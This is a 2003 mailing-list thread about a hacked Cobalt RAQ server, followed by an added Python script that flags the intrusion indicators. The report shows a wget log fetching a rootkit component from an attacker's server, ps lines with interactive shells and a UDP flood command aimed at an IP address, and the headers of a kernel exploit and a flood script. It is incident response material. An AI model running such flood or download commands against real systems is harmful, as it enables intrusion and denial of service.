
RE: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk



Herby,

Did you run that check in the link you mention?

And for anyone who is language-challenged (like me), you can run that page
through Babelfish (French to English) at
http://babelfish.altavista.com/babelfish/tr

Chuck


-----Original Message-----
From: cobalt-users-admin@xxxxxxxxxxxxxxx
[mailto:cobalt-users-admin@xxxxxxxxxxxxxxx] On Behalf Of Herby K
Sent: Thursday, December 18, 2003 5:31 AM
To: cobalt-users@xxxxxxxxxxxxxxx
Subject: [cobalt-users] RAQ hacked and scripts installed: r0nin, milk

Hi,

the files were in

ls -l /home/tmp/
total 151
----------    1 nobody   nobody      30127 Dec 18 09:07 km
----------    1 nobody   nobody      24583 Dec 18 09:07 kmod
----------    1 nobody   nobody       1730 Dec 18 09:07 l.asm --> 1)
----------    1 nobody   nobody       1465 Dec 18 09:07 mdelry.sh --> deleted the logfiles
----------    1 nobody   nobody      24006 Dec 18 09:07 milk
----------    1 nobody   nobody      41876 Dec 18 09:07 own
----------    1 nobody   nobody      19242 Dec 18 09:07 r0nin
----------    1 nobody   nobody       1089 Dec 18 09:07 udp.pl --> 2)
----------    1 nobody   nobody        710 Dec 18 09:07 wget-log --> 3)

the files were owner httpd and group root

1)
; The following program can be used to test if a x86 Linux system
; is vulnerable to the do_brk() exploit; use at your own risk.
; by Christophe Devine
; Linux Kernel 2.4.22 "do_brk()" Proof of Concept
; Advisory FR : http://www.k-otik.net/bugtraq/12.02.Kernel.2422.php

2)
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

3)
--04:33:19--  http://www.viperhaxu.hpg.com.br/kmod
           => `kmod.1'
Resolving www.viperhaxu.hpg.com.br... done.
Connecting to www.viperhaxu.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.viperhaxu.hpg.ig.com.br/kmod [following]
--04:40:29--  http://www.viperhaxu.hpg.ig.com.br/kmod
           => `kmod.1'
Resolving www.viperhaxu.hpg.ig.com.br... done.
Connecting to www.viperhaxu.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,248 [text/plain]

    0K .......... .......... .......                         100%   30.75 KB/s

04:40:32 (30.75 KB/s) - `kmod.1' saved [28248/28248]


The rest of the files are binary.

The ps -ax output of the problematic lines:


25889 ?        S      0:00 ./r0nin
28922 ?        S      0:00 ./r0nin
28923 ttyp1    S      0:00 sh -i
20515 ?        S      0:00 ./r0nin
20516 ttyp2    S      0:00 sh -i
20603 ttyp2    T      9:10 perl udp.pl 200.234.87.71 80 5000
20605 ttyp2    T      0:00 sh -c (sleep 5000;killall -9 udp) &
20606 ttyp2    T      0:00 sleep 5000

As the logfiles were deleted, we do not know how they came in.

Do you have any experience or info regarding this?

thx
Herby

_____________________________________
cobalt-users mailing list
cobalt-users@xxxxxxxxxxxxxxx
To subscribe/unsubscribe, or to SEARCH THE ARCHIVES, go to:
http://list.cobalt.com/mailman/listinfo/cobalt-users
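A small triage check over the listings in Herby's report, added here as an example and not part of the original thread or of any Cobalt tooling. The ps and ls samples are constructed from the message above, and the indicators it flags (binaries run from a relative path, `sh -i` on a pseudo-tty, a perl invocation of the form `udp.pl <ip> <port> <seconds>`, and files chmod'ed to 0000) are exactly those visible in the report.

```python
import re

# Constructed sample: the "problematic lines" from the ps -ax output in the
# report, plus one benign httpd line so the filter has something to ignore.
PS_SAMPLE = """\
25889 ?        S      0:00 ./r0nin
28922 ?        S      0:00 ./r0nin
28923 ttyp1    S      0:00 sh -i
20515 ?        S      0:00 ./r0nin
20516 ttyp2    S      0:00 sh -i
20603 ttyp2    T      9:10 perl udp.pl 200.234.87.71 80 5000
20605 ttyp2    T      0:00 sh -c (sleep 5000;killall -9 udp) &
20606 ttyp2    T      0:00 sleep 5000
  123 ?        S      0:01 httpd
"""

# Constructed sample: two lines in the shape of the ls -l /home/tmp listing.
LS_SAMPLE = """\
total 151
----------    1 nobody   nobody      30127 Dec 18 09:07 km
-rw-r--r--    1 nobody   nobody        710 Dec 18 09:07 wget-log
"""

# ps -ax columns on this kernel generation: PID TTY STAT TIME COMMAND
PS_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")
FLOOD_RE = re.compile(r"^perl \S+\.pl \d{1,3}(?:\.\d{1,3}){3} \d+ \d+$")


def suspicious_processes(ps_text):
    """Return (pid, reason, command) for each line matching an indicator."""
    hits = []
    for line in ps_text.splitlines():
        m = PS_RE.match(line)
        if not m:
            continue
        pid, tty, _state, _time, cmd = m.groups()
        if cmd.startswith("./"):
            hits.append((int(pid), "binary run from relative path", cmd))
        elif tty.startswith("ttyp") and cmd == "sh -i":
            hits.append((int(pid), "interactive shell on pseudo-tty", cmd))
        elif FLOOD_RE.match(cmd):
            hits.append((int(pid), "udp.pl-style flood invocation", cmd))
    return hits


def mode_zero_files(ls_text):
    """Names of entries whose mode is ---------- (0000), as in the report."""
    return [p[-1] for p in (l.split() for l in ls_text.splitlines())
            if len(p) >= 9 and p[0] == "-" * 10]
```

Feeding the real `ps -ax` and `ls -l` output of a box into the two functions gives a quick first pass; anything flagged should then be preserved (not deleted) for a proper look before the machine is rebuilt.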